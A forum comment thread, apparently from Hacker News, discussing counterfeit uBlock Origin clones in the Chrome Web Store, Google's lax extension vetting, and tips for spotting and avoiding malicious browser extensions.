Extensions are the new "Let's play find the download button on a webpage" that's been around for years. [1]
So many users download replicas of uBlock and find it hard to install the original uBlock Origin extension. Countless times have I had to send them direct link to Chrome's extension site just to make sure they're installing the right one. This is the case especially as the genuine extension in this case has no direct author website and instead lists a repo on Github (average users feel this indicates a knockoff and look elsewhere).
This is especially a problem when you try looking for new extensions. It's not sufficient to just look at the reviews or popularity since often times the users themselves have no idea their browsing history is being captured and sold. Also it seems that Google is in no hurry to fix this issue as even having discovered and reported malicious extensions they remain up (see: https://news.ycombinator.com/item?id=14889619).
From the client side one mitigation might be to have all extensions denied network access by default and have the user manually whitelist those in a little-snitch like manner. There is an experimental flag for something similar to this called "User consent for extension scripts." From Google's side the best thing would be to run all extensions in a sandbox like they supposedly do for Android apps and monitor its activity to see if it does anything suspicious like record browsing history, redirect pages, or call out to sketchy URLs.
> From the client side one mitigation might be to have all extensions denied network access by default and have the user manually whitelist those in a little-snitch like manner.
I don't think, Google has any interest in doing that. You can't either block internet access on a per-app basis on Android, even though this would close tons of information leaks, that the clunky permission system they currently have in place just can't fix.
And as for the best thing to do from Google's side, that would probably be what Mozilla is doing. Sit actual human beings down to look at the code of newly submitted extensions and of extension updates.
No, this does not scale, can't be automated by some algorithm, but it actually works. And it's not like it needs to scale into the millions.
A good middle ground might be to review only the top 1000 extensions or so and put a trusted checkmark on them.
Reflecting back on the automated extension review, I just realized that the problem is more complex that it seems at first glance since extensions can also contain content scripts that inject JS directly into pages themselves, so it's easy to mask the source of a POST by injecting the xhr directly into the webpage.
I had the exact same problem re: uBlock Origin. I even set up a quick site[1] a couple referrals ago just so I could have a place to easily point someone to.
>This is the case especially as the genuine extension in this case has no direct author website and instead lists a repo on Github
It's the other way round for me. I only install an extension if I find the github (or similar) repo with sufficient activity, stars or whatever. I would even sometimes use google search with the site:github.com string when looking for extensions or android apps. It would be nice if the chrome store and even android play store had a foss tick box.
Ordinarily, people might find seeing the repository straight-up too jarring. For people who aren't in the IT world, I'm not sure that seeing Github will be some definitive proof that an extension is legit.
Furthermore, it is only definitive until it isn't. If we trained users to look for the github page, we'd have forked projects that point to the compromised extension, fake github clones that look like the project, fraudulent likes, and so forth.
Even in the IT world, having spent literally my entire career writing code, I found github completely inscrutable when it first arrived, because all the explanatory text gets pushed down to the bottom of the page where you can't see it, which is completely opposite from... well... pretty much any other system of organizing information I have ever seen, ever.
I felt really pissed off, actually, that so many people were cluttering up hackernews with all these low-effort links to random unexplained directories inside unfamiliar source repos, somehow thinking it reasonable to presume that we would all want to just dig around in their source code trying to understand what it was they were attempting to do. "github.com" became a negative value signal just as strong as "experts-exchange.com", and I tried to avoid ever clicking on such worthless links.
It was probably a couple of years before I ever had reason to actually use github and discover that the information I had wanted had been present all along. Now of course the inverted layout has become second nature... but I still think it's a bad idea to send anyone who is not already a github user to a github link and expect them to find anything useful to do with it.
As an aside, anyone know why both of the major adblockers have an unrelated adblocker with the same name? (AdBlock/AdBlock Plus, uBlock/uBlock Origin.) Who thought this was a good idea?
Adblock and Adblock Plus were different developers. (Now, I believe, they are both controlled by Eyeo.) The obvious name is shared, the "Plus" were added to indicate a fork of an earlier project. I believe this was far prior to the project getting monetized.
uBlock Origin was originally just uBlock, but a rough moderator took it over (or that's somewhat the story) so there's the Origin fork with the original Dev, the uBlock project does not appear to progress anymore.
> Extensions are the new "Let's play find the download button on a webpage" that's been around for years.
Chrome extensions are that. No other browser has this problem.
I think, it's necessary to be pointing fingers here, to get Google to maybe finally do something about it and so that people don't mistakenly limit their use of extensions on other browsers.
This is, unfortunately, remarkably common. It only received a lot of attention here because it pretended to be a well-known extension: The Web Store is full of extensions which hijack your start page and search provider and have full access to all of your web content. They're often installed via pages through malicious ads which state that you must accept Chrome's install extension request to continue web browsing and use a variety of JavaScript-based tricks to keep you on the page until you do. (The other thing that occasionally gets mentioned: Extensions get bought out so that adware and spyware is automatically pushed down to Chrome users silently.)
Many times, I've reported malicious extensions I've found on user's PCs, and months later they are still alive and well on the Web Store. Google has not taken significant steps to vet browser extensions despite the massive amount of access to your personal data they have, particularly if they use permissions like accessing the content of pages you're on.
Microsoft appears to only permit Edge extensions on a case-by-case, human-vetted basis. I strongly recommend instructing lay users to use Edge over Chrome, and those who insist on Chrome should have --no-extensions added to their shortcuts to ensure Google's extension interface is wholly disabled. (At the office, I use a group policy to block all extensions on all Chrome installs network-wide. Google provides surprisingly decent tools to do this.)
Unfortunately, while Chrome regularly brags about their security measures, it does very little when they permit (and distribute) malicious extensions in their store with permissions to do whatever they want with user data. Their Pwn2Own records, their bug bounties, it's all irrelevant while they don't consider this a serious issue. It is akin to bragging about how good your deadbolt is while leaving the door wide open.
Personal auditing doesn't really solve the problem because extensions update automatically, and there are numerous cases of the authors of popular extensions being approached to sell out their userbase in exchange for cash, providing a motive for formerly-audited extensions to go bad. Here's some basic tips at defending yourself:
1. Minimize the amount of extensions you use to the bare essentials. If you can live without it, uninstall it. If you rarely use it, uninstall it.
2. Prefer extensions from well-known organizations rather than unknown individuals. Example: there are plenty of extensions that force HTTP requests to HTTPS when possible, but I exclusively use the one from the EFF. Organizations have less to gain and more to lose from breaching the trust of their users in this way.
3. Prefer extensions that multiple software developers have recommended personally. This won't itself protect you from malware, but it does increase the likelihood that emergent malware will be discovered promptly and loudly publicized.
4. If you absolutely need an extension and none of the above apply, download the source code of the extension yourself and manually load it into your browser, to keep it from being automatically updated. (Part of me is wary to recommend this, as software that never gets updated is historically prone to being exploited by lingering unpatched flaws, but I'm having a hard time coming up with an attack vector of this sort for browser extensions.)
1. Unexpected URL's or IP addresses. Most attack vectors, for example a key-logger, need to call home at some point. Keep in mind, the address may be stored in pieces that are later concatenated together, or other tricks like using charAt() that will break a naive search for "http://".
2. Blobs of base64 code or other obfuscated text that are later eval'd...
3. Or really anything in an eval function is super suspicious.
4. Remote scripts that injected into pages. Does this have plugin have a solid reason to do that? Otherwise, it's an obvious backdoor even if not necessarily nefarious.
5. Look for code that targets specific domains that are out of scope. If you're looking at an extension for a color picker, you wouldn't expect to see code targeting specific high-value sites like Paypal or Gmail.
6. If it's an email productivity add-on, is it stealing emails and contact information from signatures? It's surprisingly common.
7. Some extensions will try to swap out the advertiser IDs or change affiliate links. Unless it's an adblocker, you shouldn't expect to see any code targeting ads.
It’s hard enough to tell someone which is best, telling them the particular capitalization is impossible without giving them a direct link.
In addition, preventing duplicate names is fairly hard if you support unicode. Characters like the zero width space, Mongolian vowel separator and many others make it algorithmically different but visually they are the same.
The fake one is in the "Apps" section and the real one is in the "Extensions" section. Since apps aren't as popular overall as extensions, it's easier to game that section to get to the top.
Reminiscent of the problem earlier this year where GOOGLE DOCS ITSELF was spoofed with a Google-approved (for a brief window, at least) web app called "Google Docs":
It's even worse. 3,878,417 computers have a fake uBlock Origin clone called uBlock Plus (playing on the fact that there's Adblock and Adblock Plus) installed.
So many users download replicas of uBlock and find it hard to install the original uBlock Origin extension. Countless times have I had to send them direct link to Chrome's extension site just to make sure they're installing the right one. This is the case especially as the genuine extension in this case has no direct author website and instead lists a repo on Github (average users feel this indicates a knockoff and look elsewhere).
[1] https://www.pcworld.com/article/2012958/how-to-avoid-fake-do...